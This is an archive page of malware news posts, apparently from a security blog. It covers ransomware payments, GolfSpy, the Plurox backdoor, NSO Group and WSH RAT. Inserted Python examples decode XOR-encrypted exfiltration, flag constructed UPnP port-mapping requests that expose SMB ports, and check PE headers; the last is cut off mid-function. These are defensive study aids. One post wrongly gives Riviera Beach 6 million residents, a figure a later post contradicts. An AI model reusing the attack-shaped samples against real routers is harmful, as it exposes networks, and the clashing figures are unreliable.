Category Archives: Malware

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API, K32GetProcessImageFileName, allows endpoint security solutions, like Windows Defender, to verify whether the EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the Windows operating system APIs, which can return inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell whether a process is trustworthy. By using this technique, cybercriminals can keep malicious processes executing on a user’s device without the user knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

Riviera City In Florida Surrenders To Ransomware

Another U.S. city bites the dust: Riviera, a city in Florida with a population of 6-million residents, had its local government computers infected by ransomware. City officials embarrassingly agreed to pay the ransomware authors’ demand, to the tune of $600,000, just to recover the city’s encrypted data. City officials consider the amount a lower-cost solution compared to the estimated $941,000 the city would need to pay to rebuild the lost data from scratch.

The incident happened on May 29, 2019, when someone on the Riviera police team opened a malicious email containing ransomware. This allowed the ransomware to penetrate the whole network used by the city government. It took only a few hours for the ransomware to encrypt all the Windows computers in use that day; only the emergency services department was able to operate, in a limited fashion. City officials convened a high-level meeting to deliberate whether the city government should spend $941,000 to rebuild the entire tech infrastructure of the city, but the council instead voted unanimously to pay $600,000 worth of Bitcoin to the ransomware authors.

The trouble was compounded by the fact that the city government had not implemented a reliable backup system, which could have saved the city from paying hefty amounts to the cybercriminals behind the ransomware. According to the report, even City Hall itself, the city finance office and the water pump stations are operating only partially while the computers they use are infected. It is highly embarrassing that the city simply surrendered, relying on the very criminals behind the malware infection to decrypt its data.

“This whole thing is so new to me and so foreign and it’s almost where I can’t even believe that this happens but I’m learning that it’s not as uncommon as we would think it is. Every day I’m learning how this even operates because it just sounds so far fetched to me,” explained KaShamba Miller-Anderson, Riviera Beach Council Chairwoman.

The city itself operated on the same schedule, but many processes had to be done manually; for example, the salaries of city government employees were handed over in person instead of being deposited into individual payroll bank accounts. The email system was completely shut down, while the VOIP phone service was in partial operation. The leadership believes the city had no choice but to pay the ransom, since not only current data but also the city’s historical records were locked down.

Riviera City was not the first city whose government decided to bite the bullet and pay the criminals what they were demanding. Here in, we have reported various incidents in the past about local governments that resorted to the same action when their critical data were held hostage. The only reliable way to fully recover from a ransomware infection without paying the ransom is to have a reliable and secure backup infrastructure. In the age of a highly competitive cloud-storage market, it is not acceptable to run production systems without any form of backup.


Smashing Security #133: Cookie cock-ups, Hong Kong protests, and smart TV virus scans

We head to Hong Kong to look at how technology has helped anti-government protesters (and how China has tried to disrupt it), Samsung is skittish over whether to tell TV owners to virus-scan their devices, and you won’t believe whose website is not GDPR-compliant.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by James Thomson.

The Riviera Beach City pays $600,000 in ransom

The Riviera Beach City, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system.

The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council had previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s system three weeks ago, encrypting data managed by the City.

The internal IT staff has been working with security consultants to restore the operations, but according to them the only way to decrypt the information was to pay the ransom. 

“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press. “Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”

The attack began on May 29: the infection started when an employee at the Riviera Beach police department opened a malicious email containing a link that, once clicked, infected the PC.

The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems. The email system was disabled, employees and vendors were paid by check rather than direct deposit, and communications went down, with 911 dispatchers unable to accept calls even though the service continued to operate.

Initially, the city council decided not to pay the ransom, but due to the difficulties in restoring operations, it opted to pay.

On Monday, city officials participating in a hastily convened meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).

“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Riviera Beach City, hacking)

The post The Riviera Beach City pays $600,000 in ransom appeared first on Security Affairs.

Riviera Beach Pays Nearly $600K to Recover Data after Ransomware Attack

Riviera Beach paid bad actors approximately $600,000 in ransom to recover its information after it fell victim to a ransomware attack. On 17 June, the board of the Palm Beach County municipality voted unanimously to authorize that the city insurer pay 65 bitcoins (worth approximately $602,000 at the time of this writing) to those responsible […]

The post Riviera Beach Pays Nearly $600K to Recover Data after Ransomware Attack appeared first on The State of Security.

Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf’, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, which implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts who analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with the GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to the Domestic Kitten espionage activities, an extensive surveillance operation conducted by an Iranian APT actor and aimed at specific groups of individuals since 2016.

Experts found some similarities between the two, namely similarly structured code strings and the same format for the data targeted for theft.


The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose which data types to collect. Stolen data is encrypted using a simple XOR operation with a pre-configured key and then sent to the C2 via HTTP POST requests.

GolfSpy also connects to the C2 via a socket in order to receive additional commands. In this case, stolen data is also sent to the C2 in encrypted form via the socket; experts pointed out that the encryption key is different from the one used when data is sent via HTTP.
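Because a repeating-key XOR is its own inverse, an analyst who knows how a stolen record begins can recover the key from a captured POST body and decode the rest. The following is an added example (not Trend Micro’s code, and not GolfSpy’s real key or record format); the key, the record layout and the captured body are all constructed for illustration. The same routine applies separately to the socket channel, which the report says uses a different key.

```python
"""Known-plaintext recovery of a repeating XOR key from a captured exfil body.

Added example for analysing GolfSpy-style captures; not Trend Micro's code.
The key, the record format and the captured body are constructed.
"""
from itertools import cycle
from typing import Optional


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR. Applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_repeating_key(ciphertext: bytes, known_plaintext: bytes) -> Optional[bytes]:
    """Derive the key from the plaintext the analyst expects at the record start.

    XORing ciphertext with the known prefix yields the raw key stream; the
    smallest period that repeats across the whole known span is the key.
    Returns None when the known prefix is too short to confirm any period
    (at least two full repetitions are required).
    """
    stream = xor_with_key(ciphertext[: len(known_plaintext)], known_plaintext)
    for period in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i + period] for i in range(len(stream) - period)):
            return stream[:period]
    return None


def decode_capture(body: bytes, known_prefix: bytes) -> Optional[str]:
    """Recover the key from `body` and return the decoded record, or None."""
    key = recover_repeating_key(body, known_prefix)
    if key is None:
        return None
    return xor_with_key(body, key).decode("utf-8", errors="replace")


# Constructed sample: a record as the implant might POST it, XORed with a
# constructed 4-byte key. Neither value comes from the real malware.
CONSTRUCTED_KEY = b"k3y!"
CONSTRUCTED_RECORD = b'{"device_id":"a1b2c3d4","type":"sms","data":["hello"]}'
CAPTURED_BODY = xor_with_key(CONSTRUCTED_RECORD, CONSTRUCTED_KEY)
KNOWN_PREFIX = b'{"device_id":"'  # the analyst's assumption about how records start

if __name__ == "__main__":
    print("recovered key:", recover_repeating_key(CAPTURED_BODY, KNOWN_PREFIX))
    print("decoded record:", decode_capture(CAPTURED_BODY, KNOWN_PREFIX))
```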

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device.”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)

The post Bouncing Golf cyberespionage campaign targets Android users in Middle East appeared first on Security Affairs.

Botnets shift from Windows towards Linux and IoT platforms

Botnets in 2018 continued to use DDoS as their primary weapon to attack high-speed networks, according to NSFOCUS. Continuous monitoring and research of botnets discovered significant changes taking place in the coding of malware used to create bots, operations, and maintenance of botnets and IP Chain-Gangs. Throughout 2018, NSFOCUS developed profiles on 82 IP Chain-Gangs, groups of bots from multiple botnets acting in concert during specific cyber-attack campaigns. Understanding botnets in general and IP Chain-Gangs, …

The post Botnets shift from Windows towards Linux and IoT platforms appeared first on Help Net Security.

Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware. 

Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware. 

The Plurox backdoor is written in C and compiled with Mingw GCC; it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure and uses a variety of plugins to implement its functionality.

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.  

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor supports a UPnP plugin designed to target a local network.

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

If administrators detect the attack on the host, they will see it coming directly from the router rather than from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 
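A network defender can spot this plugin’s behaviour at the router: each forward it creates is an IGD `AddPortMapping` request whose internal port is 135 or 445 (or 139, in the EternalSilence variant). The following is an added example (not Kaspersky’s code) that parses such SOAP requests and flags mappings exposing those ports; the requests are constructed to the `WANIPConnection` `AddPortMapping` schema, and a real deployment would feed it from a capture of traffic to the router’s UPnP control URL.

```python
"""Flag UPnP AddPortMapping requests that expose MS-RPC/SMB ports.

Added example, not Kaspersky's code. The SOAP requests below are constructed
to the WANIPConnection AddPortMapping schema for illustration.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Internal ports the Plurox plugin forwards (135, 445) plus 139 from EternalSilence.
RISKY_TCP_PORTS = {135, 139, 445}
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


@dataclass
class PortMapping:
    external_port: int
    internal_port: int
    internal_client: str
    protocol: str
    description: str
    lease_seconds: int


def _local(tag: str) -> str:
    """Strip an XML namespace prefix: '{ns}Name' -> 'Name'."""
    return tag.split("}")[-1]


def parse_add_port_mapping(soap_body: str) -> Optional[PortMapping]:
    """Return the mapping requested by an AddPortMapping call, or None."""
    root = ET.fromstring(soap_body)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return None
    for action in body:
        if _local(action.tag) != "AddPortMapping":
            continue
        args = {_local(child.tag): (child.text or "").strip() for child in action}
        try:
            return PortMapping(
                external_port=int(args["NewExternalPort"]),
                internal_port=int(args["NewInternalPort"]),
                internal_client=args["NewInternalClient"],
                protocol=args.get("NewProtocol", "TCP").upper(),
                description=args.get("NewPortMappingDescription", ""),
                lease_seconds=int(args.get("NewLeaseDuration", "0")),
            )
        except (KeyError, ValueError):
            return None  # malformed request: required argument missing or not numeric
    return None


def is_suspicious(mapping: PortMapping) -> bool:
    """True when a LAN host's MS-RPC/SMB port is being exposed to the outside."""
    return mapping.protocol == "TCP" and mapping.internal_port in RISKY_TCP_PORTS


def scan_requests(requests: List[str]) -> List[str]:
    """Return one alert line per request that exposes a risky internal port."""
    alerts = []
    for body in requests:
        m = parse_add_port_mapping(body)
        if m is not None and is_suspicious(m):
            alerts.append(
                f"{m.internal_client}:{m.internal_port}/{m.protocol} exposed on "
                f"external port {m.external_port} ({m.description or 'no description'})"
            )
    return alerts


def _soap(ext: int, internal_ip: str, internal_port: int,
          proto: str = "TCP", desc: str = "", lease: int = 0) -> str:
    """Build a constructed AddPortMapping request for the sample set below."""
    return f"""<?xml version="1.0"?>
<s:Envelope xmlns:s="{SOAP_NS}" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>{ext}</NewExternalPort>
      <NewProtocol>{proto}</NewProtocol>
      <NewInternalPort>{internal_port}</NewInternalPort>
      <NewInternalClient>{internal_ip}</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>{desc}</NewPortMappingDescription>
      <NewLeaseDuration>{lease}</NewLeaseDuration>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>"""


# Constructed sample: one benign console mapping, one UDP DNS mapping, and two
# that expose MS-RPC and SMB on the same LAN host (the pattern the plugin produces).
SAMPLE_REQUESTS = [
    _soap(3074, "192.168.1.20", 3074, desc="Console"),
    _soap(41135, "192.168.1.37", 135),
    _soap(41445, "192.168.1.37", 445, desc="svc"),
    _soap(53, "192.168.1.5", 53, proto="UDP"),
]

if __name__ == "__main__":
    for line in scan_requests(SAMPLE_REQUESTS):
        print("ALERT:", line)
```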

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

The module borrows code from the Trickster Trojan, so the researchers believe the authors of Plurox and Trickster may be linked.

Further technical details, including IoCs, are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Modular Plurox backdoor can spread over local network appeared first on Security Affairs.

Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following the revelation of the Guardian newspaper about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called “misguided personal attacks on me and my family”.”

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said.

The principal product of the NSO Group is a surveillance software called Pegasus; it allows its operators to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.


Pegasus is a perfect tool for surveillance: it is able to steal any kind of data from smartphones and to use their camera and microphone to spy on the surrounding environment.

The NSO Group operated in the dark for several years, until researchers from the Citizen Lab organization and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who had reported to the public a story of corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International were corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi Arabia, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” she continued.

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillance)

The post Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group appeared first on Security Affairs.

What is Malware?

Any person who has ever used a computer has probably heard the term “malware.” It is everywhere, and the general consensus is that we have to be careful and protect ourselves from it. But what is the malware definition? What is it and why are people afraid of it?

The first thing you have to know when it comes to the malware definition is that it is software much like any other program on your computer. However, its intention is to inhibit, damage, or disable your computer system without your knowledge. It is malicious software, hence the term.

Today, malware attacks continue to grow. They have become more frequent, and malware has become more sophisticated. Detecting and resolving these issues has become harder and harder as time goes by. With every new defense, there seem to be two new pieces of malware out there. And if they get into your system, they will steal proprietary data from your computer, causing major damage before they are even detected.

Defending Against Malware Attacks

Now that you know the malware definition, the next step is to protect yourself against it. This is especially true for organizations such as schools and businesses, where sensitive information can be stolen by these programs. So, the first thing to do is educate people in recognizing potential attacks and vulnerabilities. Everyone should follow a proactive approach in defending against these threats.

Security Updates

Everyone should install security updates and patches from known sources as soon as they become available. These updates give your defenses more ways of identifying new malware and threats. Updating is particularly important for commonly used programs.

Avoid and Report Suspicious Emails

When receiving emails from unknown sources, do not click on any attachment, file, or link that is in there. They can contain malware. Instead, report this to your IT personnel so they can properly investigate if this is a safe email or if it is an attempted attack.

If you accidentally click on the link or files, immediately report it to your IT or security personnel so they can track, analyze, and attempt to mitigate the attack.

Avoid Suspicious Websites

Websites without security protocols are breeding grounds for malware. Avoid these websites as much as possible; simply visiting such a website can be enough to infect your computer.

Use Your Firewall

Computer systems today should have firewalls that create a barrier against such threats. Make sure that yours is always turned on so you have a blanket of security.

Use Anti-virus/Anti-malware Programs

If there are malicious programs, there are anti-malicious programs as well. These are designed to identify known malware and protect you from it. They scan all your files, especially the areas most commonly infected, to detect and remove it. These programs also help in proactively defending your computer from malicious attacks.

Limit App Privileges

When malware successfully enters your computer, it requires full access in order to run properly. With that in mind, what you can do is use account controls to limit what programs can do without your permission. You will then be notified whenever a program attempts to make changes to your computer, and you can stop it right then and there.

By following these simple practices, you and your employees can help mitigate the risk of being infected with malware. These should become a habit for everyone, so it is recommended to enforce these practices for every user of the network. Only by creating a layered defense can an organization be safe from cyber attacks.


A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a decryptor tool released on the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on” reads the press release published by Europol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape in early 2018, when experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in a Russian hacking community on the dark web, and researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but in June they announced they are shutting down their operation and affiliates are being told to stop distributing the ransomware.


In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators revealed they have generated more than $2 billion in ransom payments, earning on average $2.5 million per week. The operators also declared they had earned a net $150 million, which they have now invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms.

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandCrab decryption tool for free at the following address:

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber army has been targeting the Russian power grid with reconnaissance operations since at least 2012, but recently it has also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”


The hacking operations aimed to warn the Russian Government about the cyber capabilities of the U.S. Cyber Command and could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that there is no evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT.

The New York Times added that, according to two US officials, Trump was not fully informed about the cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid, fearing a possible reaction from the President due to his relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017 when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

New phishing campaign targets bank customers with WSH RAT

Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.

Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.

The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.

Threat actors are using the RAT to deliver keyloggers and information stealers.

“The Cofense Phishing Defense Center™ (PDC) and Cofense Intelligence™ have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofense. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing.”

WSH Remote Access Tool (RAT) is a variant of the VBS (Visual Basic Script) based Houdini Worm (H-Worm) that first appeared in the threat landscape in 2013 and was updated in 2016.

WSH Remote Access Tool (RAT) differs from Houdini because it is in JavaScript and uses a different User-Agent string and delimiter character when communicating with its command-and-control (C2) server.

The phishing messages contain an MHT file that includes an href link which, once opened, directs victims to a .zip archive containing a version of WSH RAT.

WSH RAT attack

The RAT allows attackers to steal sensitive data, including passwords from victims’ browsers and email clients, and it also implements keylogging capabilities. The experts pointed out that the RAT allows the attackers to remotely control the victim’s systems; it is also able to kill anti-malware solutions and disable Windows UAC.

The authors of the malware are offering the WSH RAT for rent: buyers pay a subscription fee of $50 per month to use all the features they have implemented.

“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”

Once the RAT has reached the C2 server, it downloads and drops three additional files with a .tar.gz extension that are actually PE32 executables.

The three downloaded payloads are a keylogger, a mail credential viewer, and a browser credential viewer. The three components were developed by third parties, not by the WSH RAT operator, and are used by the campaign operators to collect credentials and other sensitive information.
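The extension-versus-content mismatch described above (a ".tar.gz" that is really a PE32 binary) is something a download proxy or sandbox can check by parsing the file header instead of trusting the name. This is an added example, not code from the post or from Cofense; the PE bytes it builds are a constructed minimal header, not a real payload.

```python
"""Flag files whose extension claims gzip/tarball but whose bytes are a PE.

Added example, not from the post or Cofense. The sample PE built by fake_pe()
is constructed: the smallest MZ/PE/optional-header skeleton this check accepts.
"""
import struct

GZIP_MAGIC = b"\x1f\x8b"
IMAGE_FILE_MACHINE_I386 = 0x014C        # value used in the constructed header


def pe_kind(data: bytes):
    """Return 'PE32' or 'PE32+' if data carries a valid MZ/PE header, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]      # IMAGE_DOS_HEADER.e_lfanew
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER is 20 bytes; IMAGE_OPTIONAL_HEADER.Magic follows it
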